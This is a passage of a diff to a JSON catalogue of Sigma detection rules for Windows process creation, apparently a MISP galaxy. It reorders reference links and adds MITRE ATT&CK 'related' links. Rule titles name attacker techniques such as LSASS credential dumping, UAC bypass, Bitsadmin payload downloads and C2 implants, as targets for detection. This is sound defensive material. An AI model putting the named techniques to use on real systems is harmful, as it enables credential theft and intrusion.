"estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "4ae81040-fc1c-4249-bfa3-938d260214d9", "value": "Use Icacls to Hide File to Everyone" }, @@ -28867,10 +36574,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://attack.mitre.org/techniques/T1036/", + "https://www.carbonblack.com/2014/06/10/screenshot-demo-hunt-evil-faster-than-ever-with-carbon-black/", "https://securitybytes.io/blue-team-fundamentals-part-two-windows-processes-759fe15965e2", "https://www.13cubed.com/downloads/windows_process_genealogy_v2.pdf", - "https://www.carbonblack.com/2014/06/10/screenshot-demo-hunt-evil-faster-than-ever-with-carbon-black/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_proc_wrong_parent.yml" ], "tags": [ @@ -28879,6 +36585,15 @@ "attack.t1036.005" ] }, + "related": [ + { + "dest-uuid": "bd5b58a4-a52d-4a29-bc0d-3f1d3968eb6b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "96036718-71cc-4027-a538-d1587e0006a7", "value": "Windows Processes Suspicious Parent Directory" }, @@ -28951,6 +36666,15 @@ "attack.t1218" ] }, + "related": [ + { + "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "fbd7c32d-db2a-4418-b92c-566eb8911133", "value": "SyncAppvPublishingServer Execute Arbitrary PowerShell Code" }, @@ -28977,6 +36701,15 @@ "attack.t1105" ] }, + "related": [ + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "0c79148b-118e-472b-bdb7-9b57b444cc19", "value": "Malicious Payload Download via Office Binaries" }, @@ -29001,6 +36734,15 @@ "attack.t1204" ] }, + "related": [ + { + "dest-uuid": "8c32eb4d-805f-4fc5-bf60-c4d476c131b5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "5325945e-f1f0-406e-97b8-65104d393fff", "value": "Snatch Ransomware" }, @@ -29017,9 +36759,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows", "https://github.com/netero1010/TrustedPath-UACBypass-BOF", "https://medium.com/tenable-techblog/uac-bypass-by-mocking-trusted-directories-24a96675f6e", - "https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_uac_bypass_trustedpath.yml" ], "tags": [ @@ -29027,6 +36769,15 @@ "attack.t1548.002" ] }, + "related": [ + { + "dest-uuid": "120d5519-3098-4e1c-9191-2aa61232f073", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "4ac47ed3-44c2-4b1f-9d51-bf46e8914126", "value": "TrustedPath UAC Bypass Pattern" }, @@ -29043,8 +36794,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules", "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Wfc/", + "https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_wfc.yml" ], "tags": [ @@ -29052,6 +36803,15 @@ "attack.t1127" ] }, + "related": [ + { + "dest-uuid": "ff25900d-76d5-449b-a351-8824e62fc81b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "49be8799-7b4d-4fda-ad23-cafbefdebbc5", "value": "Use of Wfc.exe" }, @@ -29068,10 +36828,10 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://blog.talosintelligence.com/breaking-the-silence-recent-truebot-activity/", - "https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin", - "https://isc.sans.edu/diary/22264", "https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/", + "https://isc.sans.edu/diary/22264", + "https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin", + "https://blog.talosintelligence.com/breaking-the-silence-recent-truebot-activity/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bitsadmin_download_susp_ip.yml" ], "tags": [ @@ -29082,6 +36842,22 @@ "attack.t1036.003" ] }, + "related": [ + { + "dest-uuid": "c8e87b83-edbb-48d4-9295-4974897525b7", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "bd5b58a4-a52d-4a29-bc0d-3f1d3968eb6b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "99c840f2-2012-46fd-9141-c761987550ef", "value": "Bitsadmin Download File from IP" }, @@ -29098,9 +36874,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/Hexacorn/status/1420053502554951689", "https://www.matteomalvica.com/blog/2019/12/02/win-defender-atp-cred-bypass/", "https://twitter.com/SBousseaden/status/1464566846594691073?s=20", + "https://twitter.com/Hexacorn/status/1420053502554951689", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_lsass_clone.yml" ], "tags": [ @@ -29109,6 +36885,22 @@ "attack.t1003.001" ] }, + "related": [ + { + "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "c8da0dfd-4ed0-4b68-962d-13c9c884384e", "value": "Suspicious LSASS Process Clone" }, @@ -29138,6 +36930,22 @@ "attack.t1027" ] }, + "related": [ + { + "dest-uuid": "bd5b58a4-a52d-4a29-bc0d-3f1d3968eb6b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "b0533c6e-8fea-4788-874f-b799cacc4b92", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "0c92f2e6-f08f-4b73-9216-ecb0ca634689", "value": "Potential PE Metadata Tamper Using Rcedit" }, @@ -29164,6 +36972,15 @@ "attack.t1027" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "47688f1b-9f51-4656-b013-3cc49a166a36", "value": "Base64 Encoded Listing of Shadowcopy" }, @@ -29180,9 +36997,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://redcanary.com/blog/raspberry-robin/", - "https://github.com/SigmaHQ/sigma/issues/1009", "https://www.microsoft.com/en-us/security/blog/2022/10/27/raspberry-robin-worm-part-of-larger-ecosystem-facilitating-pre-ransomware-activity/", + "https://github.com/SigmaHQ/sigma/issues/1009", + "https://redcanary.com/blog/raspberry-robin/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_shellexec_rundll_usage.yml" ], "tags": [ @@ -29228,8 +37045,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Gpscript/", "https://oddvar.moe/2018/04/27/gpscript-exe-another-lolbin-to-the-list/", + "https://lolbas-project.github.io/lolbas/Binaries/Gpscript/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_gpscript.yml" ], "tags": [ @@ -29237,6 +37054,15 @@ "attack.t1218" ] }, + "related": [ + { + "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "1e59c230-6670-45bf-83b0-98903780607e", "value": "Gpscript Execution" }, @@ -29253,12 +37079,10 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://attack.mitre.org/techniques/T1482/", - "https://thedfirreport.com/2021/08/16/trickbot-leads-up-to-fake-1password-installation/", - "https://book.hacktricks.xyz/windows/basic-cmd-for-pentesters", "https://research.nccgroup.com/2022/08/19/back-in-black-unlocking-a-lockbit-3-0-ransomware-attack/", "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731935(v=ws.11)", - "https://attack.mitre.org/techniques/T1016/", + "https://thedfirreport.com/2021/08/16/trickbot-leads-up-to-fake-1password-installation/", + "https://book.hacktricks.xyz/windows/basic-cmd-for-pentesters", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_nltest_recon.yml" ], "tags": [ @@ -29267,6 +37091,15 @@ "attack.t1482" ] }, + "related": [ + { + "dest-uuid": "767dbf9e-df3f-45cb-8998-4903ab5f80c0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "5cc90652-4cbd-4241-aa3b-4b462fa5a248", "value": "Recon Activity with NLTEST" }, @@ -29291,6 +37124,15 @@ "attack.t1562.004" ] }, + "related": [ + { + "dest-uuid": "5372c5fe-f424-4def-bcd5-d3a8e770f07b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "01aeb693-138d-49d2-9403-c4f52d7d3d62", "value": "Netsh RDP Port Opening" }, @@ -29315,6 +37157,15 @@ "attack.t1505.002" ] }, + "related": [ + { + "dest-uuid": "35187df2-31ed-43b6-a1f5-2f1d3d58d3f1", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "83809e84-4475-4b69-bc3e-4aad8568612f", "value": "MSExchange Transport Agent Installation" }, @@ -29342,6 +37193,15 @@ "car.2019-04-001" ] }, + "related": [ + { + "dest-uuid": "4cbc6a62-9e34-4f94-8a19-5c1a11392a49", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "7d4cdc5a-0076-40ca-aac8-f7e714570e47", "value": "CMSTP Execution Process Creation" }, @@ -29373,6 +37233,36 @@ "attack.t1490" ] }, + "related": [ + { + "dest-uuid": "9db0cf3a-a3c9-4012-8268-123b9db6fd82", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "34e793de-0274-4982-9c1a-246ed1c19dee", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "b80d107d-fa0d-4b60-9684-b0433e8bdba0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "f5d8eed6-48a9-4cdf-a3d7-d1ffa99c3d2a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "41d40bff-377a-43e2-8e1b-2e543069e079", "value": "WannaCry Ransomware" }, @@ -29397,6 +37287,15 @@ "attack.t1053.005" ] }, + "related": [ + { + "dest-uuid": "005a06c6-14bf-4118-afa0-ebcd8aebb0c9", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "43f487f0-755f-4c2a-bce7-d6d2eec2fcf8", "value": "Suspicious Add Scheduled Task From User AppData Temp" }, @@ -29422,6 +37321,15 @@ "attack.t1204.002" ] }, + "related": [ + { + "dest-uuid": "232b7f21-adf9-4b42-b936-b9d6f7df856e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "438025f9-5856-4663-83f7-52f878a70a50", "value": "Microsoft Office Product Spawning Windows Shell" }, @@ -29447,6 +37355,22 @@ "attack.t1027" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "3ccef7ae-cb5e-48f6-8302-897105fbf55c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "bb780e0c-16cf-4383-8383-1e5471db6cf9", "value": "Suspicious XOR Encoded PowerShell Command Line" }, @@ -29463,8 +37387,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.mandiant.com/resources/blog/sharpersist-windows-persistence-toolkit", "https://github.com/mandiant/SharPersist", + "https://www.mandiant.com/resources/blog/sharpersist-windows-persistence-toolkit", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hack_sharpersist.yml" ], "tags": [ @@ -29514,8 +37438,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/BloodHoundAD/SharpHound", "https://github.com/BloodHoundAD/BloodHound", + "https://github.com/BloodHoundAD/SharpHound", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hack_bloodhound.yml" ], "tags": [ @@ -29529,6 +37453,43 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "25659dd6-ea12-45c4-97e6-381e3e4b593e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "767dbf9e-df3f-45cb-8998-4903ab5f80c0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "a01bf75f-00b2-4568-a58f-565ff9bf202b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "2aed01ad-3df3-4410-a8cb-11ea4ded587c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "f376c8a7-a2d0-4ddc-aa0c-16c17236d962", "value": "Bloodhound and Sharphound Hack Tool" }, @@ -29545,8 +37506,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-windows-management-instrumentation.pdf", "https://twitter.com/johnlatwc/status/1408062131321270282?s=12", + "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-windows-management-instrumentation.pdf", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_wmic_eventconsumer_create.yml" ], "tags": [ @@ -29554,6 +37515,15 @@ "attack.t1546.003" ] }, + "related": [ + { + "dest-uuid": "910906dd-8c0a-475a-9cc1-5e029e2fad58", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "ebef4391-1a81-4761-a40a-1db446c0e625", "value": "Suspicious WMIC ActiveScriptEventConsumer Creation" }, @@ -29580,6 +37550,15 @@ "attack.t1546.003" ] }, + "related": [ + { + "dest-uuid": "910906dd-8c0a-475a-9cc1-5e029e2fad58", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "ec1d5e28-8f3b-4188-a6f8-6e8df81dc28e", "value": "WMI Persistence - Script Event Consumer" }, @@ -29605,6 +37584,15 @@ "attack.t1059" ] }, + "related": [ + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "42333b2c-b425-441c-b70e-99404a17170f", "value": "Sliver C2 Implant Activity Pattern" }, @@ -29653,6 +37641,15 @@ "attack.privilege_escalation" ] }, + "related": [ + { + "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "5cc2cda8-f261-4d88-a2de-e9e193c86716", "value": "Suspicious Processes Spawned by WinRM" }, @@ -29723,6 +37720,15 @@ "attack.t1218.011" ] }, + "related": [ + { + "dest-uuid": "045d0922-2310-4e60-b5e4-3302302cb3c5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "b18c9d4c-fac9-4708-bd06-dd5bfacf200f", "value": "F-Secure C3 Load by Rundll32" }, @@ -29739,8 +37745,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/Oddvarmoe/status/1270633613449723905", "https://hackingiscool.pl/cmdhijack-command-argument-confusion-with-path-traversal-in-cmd-exe/", + "https://twitter.com/Oddvarmoe/status/1270633613449723905", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_commandline_path_traversal.yml" ], "tags": [ @@ -29748,6 +37754,15 @@ "attack.t1059.003" ] }, + "related": [ + { + "dest-uuid": "d1fcf083-a721-4223-aedf-bf8960798d62", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "087790e3-3287-436c-bccf-cbd0184a7db1", "value": "Cmd.exe CommandLine Path Traversal" }, @@ -29796,6 +37811,15 @@ "attack.t1216" ] }, + "related": [ + { + "dest-uuid": "f6fe9070-7a65-49ea-ae72-76292f42cebe", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "7d4aaec2-08ed-4430-8b96-28420e030e04", "value": "Suspicious Sigverif Execution" }, @@ -29822,6 +37846,15 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "74403157-20f5-415d-89a7-c505779585cf", "value": "Encoded PowerShell Command Line Usage of ConvertTo-SecureString" }, @@ -29870,6 +37903,15 @@ "attack.t1105" ] }, + "related": [ + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "185d7418-f250-42d0-b72e-0c8b70661e93", "value": "Suspicious Diantz Download and Compress Into a CAB File" }, @@ -29888,9 +37930,9 @@ "refs": [ "https://isc.sans.edu/diary/22264", "https://www.cisa.gov/uscert/ncas/alerts/aa22-321a", - "https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin", "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker", "https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/", + "https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bitsadmin_download_susp_domain.yml" ], "tags": [ @@ -29901,6 +37943,22 @@ "attack.t1036.003" ] }, + "related": [ + { + "dest-uuid": "c8e87b83-edbb-48d4-9295-4974897525b7", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "bd5b58a4-a52d-4a29-bc0d-3f1d3968eb6b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "8518ed3d-f7c9-4601-a26c-f361a4256a0c", "value": "Bitsadmin Download from Suspicious Domain" }, @@ -29917,9 +37975,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/nas_bench/status/1534915321856917506", - "https://twitter.com/nas_bench/status/1534916659676422152", "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Adplus/", + "https://twitter.com/nas_bench/status/1534916659676422152", + "https://twitter.com/nas_bench/status/1534915321856917506", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_adplus.yml" ], "tags": [ @@ -29928,6 +37986,15 @@ "attack.t1003.001" ] }, + "related": [ + { + "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "2f869d59-7f6a-4931-992c-cce556ff2d53", "value": "Use of Adplus.exe" }, @@ -29944,8 +38011,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/", "https://www.nirsoft.net/utils/nircmd.html", + "https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/", "https://www.nirsoft.net/utils/nircmd2.html#using", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_tool_nircmd_as_system.yml" ], @@ -29955,6 +38022,15 @@ "attack.s0029" ] }, + "related": [ + { + "dest-uuid": "f1951e8a-500e-4a26-8803-76d95c4554b4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "d9047477-0359-48c9-b8c7-792cedcdc9c4", "value": "NirCmd Tool Execution As LOCAL SYSTEM" }, @@ -29981,6 +38057,15 @@ "attack.t1027" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "fd6e2919-3936-40c9-99db-0aa922c356f7", "value": "Malicious Base64 Encoded Powershell Invoke Cmdlets" }, @@ -30006,6 +38091,15 @@ "attack.t1059.005" ] }, + "related": [ + { + "dest-uuid": "dfd7cc1d-e1d8-4394-a198-97c4cab8aa67", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "966e4016-627f-44f7-8341-f394905c361f", "value": "WMIExec VBS Script" }, @@ -30033,7 +38127,7 @@ "value": "Taskmgr as LOCAL_SYSTEM" }, { - "description": "Detects a Get-Process command on lsass process, which is in almost all cases a sign of malicious activity", + "description": "Detects a \"Get-Process\" cmdlet and it's aliases on lsass process, which is in almost all cases a sign of malicious activity", "meta": { "author": "Florian Roth", "creation_date": "2021/04/23", @@ -30053,6 +38147,15 @@ "attack.t1552.004" ] }, + "related": [ + { + "dest-uuid": "60b508a1-6a5e-46b1-821a-9f7b78752abf", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "b2815d0d-7481-4bf0-9b6c-a4c48a94b349", "value": "PowerShell Get-Process LSASS" }, @@ -30078,6 +38181,15 @@ "attack.t1218" ] }, + "related": [ + { + "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "a85ffc3a-e8fd-4040-93bf-78aff284d801", "value": "Use Of The SFTP.EXE Binary As A LOLBIN" }, @@ -30104,6 +38216,15 @@ "attack.t1548.002" ] }, + "related": [ + { + "dest-uuid": "120d5519-3098-4e1c-9191-2aa61232f073", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "4cbef972-f347-4170-b62a-8253f6168e6d", "value": "UAC Bypass Using IDiagnostic Profile" }, @@ -30120,8 +38241,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://lolbas-project.github.io/lolbas/Libraries/Pcwutl/", "https://twitter.com/harr0ey/status/989617817849876488", + "https://lolbas-project.github.io/lolbas/Libraries/Pcwutl/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_pcwutl.yml" ], "tags": [ @@ -30129,6 +38250,15 @@ "attack.t1218.011" ] }, + "related": [ + { + "dest-uuid": "045d0922-2310-4e60-b5e4-3302302cb3c5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "9386d78a-7207-4048-9c9f-a93a7c2d1c05", "value": "Code Execution via Pcwutl.dll" }, @@ -30181,6 +38311,15 @@ "attack.t1059.003" ] }, + "related": [ + { + "dest-uuid": "d1fcf083-a721-4223-aedf-bf8960798d62", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "ee5e119b-1f75-4b34-add8-3be976961e39", "value": "Conhost.exe CommandLine Path Traversal" }, @@ -30206,6 +38345,15 @@ "attack.t1036.003" ] }, + "related": [ + { + "dest-uuid": "bd5b58a4-a52d-4a29-bc0d-3f1d3968eb6b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "edd8a48c-1b9f-4ba1-83aa-490338cd1ccb", "value": "Renamed jusched.exe" }, @@ -30232,6 +38380,15 @@ "attack.t1222.001" ] }, + "related": [ + { + "dest-uuid": "34e793de-0274-4982-9c1a-246ed1c19dee", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "554601fb-9b71-4bcc-abf4-21a611be4fde", "value": "Suspicious Recursive Takeown" }, @@ -30281,6 +38438,15 @@ "attack.t1548.002" ] }, + "related": [ + { + "dest-uuid": "120d5519-3098-4e1c-9191-2aa61232f073", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "0058b9e5-bcd7-40d4-9205-95ca5a16d7b2", "value": "UAC Bypass Using Windows Media Player - Process" }, @@ -30305,6 +38471,15 @@ "attack.t1572" ] }, + "related": [ + { + "dest-uuid": "4fe28b27-b13c-453e-a386-c2ef362a573b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "f38ce0b9-5e97-4b47-a211-7dc8d8b871da", "value": "Suspicious Plink Usage RDP Tunneling" }, @@ -30353,6 +38528,15 @@ "attack.t1055.001" ] }, + "related": [ + { + "dest-uuid": "f4599aa0-4f85-4a32-80ea-fc39dc965945", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "d1aa3382-abab-446f-96ea-4de52908210b", "value": "TAIDOOR RAT DLL Load" }, @@ -30377,6 +38561,15 @@ "attack.t1068" ] }, + "related": [ + { + "dest-uuid": "b21c3b2d-02e6-45b1-980b-e69051040839", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "c01f7bd6-0c1d-47aa-9c61-187b91273a16", "value": "SystemNightmare Exploitation Script Execution" }, @@ -30393,9 +38586,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.echotrail.io/insights/search/wermgr.exe", - "https://github.com/binderlabs/DirCreate2System", "https://www.trendmicro.com/en_us/research/22/j/black-basta-infiltrates-networks-via-qakbot-brute-ratel-and-coba.html", + "https://github.com/binderlabs/DirCreate2System", + "https://www.echotrail.io/insights/search/wermgr.exe", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_wermgr.yml" ], "tags": "No established tags" @@ -30425,6 +38618,15 @@ "attack.t1059" ] }, + "related": [ + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "6bba49bf-7f8c-47d6-a1bb-6b4dece4640e", "value": "Suspicious RASdial Activity" }, @@ -30441,8 +38643,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/cyb3rops/status/1562072617552678912", "https://ss64.com/nt/cmd.html", + "https://twitter.com/cyb3rops/status/1562072617552678912", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_missing_spaces.yml" ], "tags": [ @@ -30450,6 +38652,15 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "a16980c2-0c56-4de0-9a79-17971979efdd", "value": "Missing Space Characters in Command Lines" }, @@ -30466,10 +38677,10 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://redcanary.com/blog/raspberry-robin/", - "https://twitter.com/Hexacorn/status/1187143326673330176", "https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-94a1964b682707e4e3f77dd61a3bfface5401d08d8cf81145f388e09614aceca", "https://lolbas-project.github.io/lolbas/Binaries/Odbcconf/", + "https://redcanary.com/blog/raspberry-robin/", + "https://twitter.com/Hexacorn/status/1187143326673330176", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_odbcconf.yml" ], "tags": [ @@ -30477,6 +38688,15 @@ "attack.t1218.008" ] }, + "related": [ + { + "dest-uuid": "6e3bd510-6b33-41a4-af80-2d80f3ee0071", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "65d2be45-8600-4042-b4c0-577a1ff8a60e", "value": "Application Whitelisting Bypass via DLL Loaded by odbcconf.exe" }, @@ -30502,6 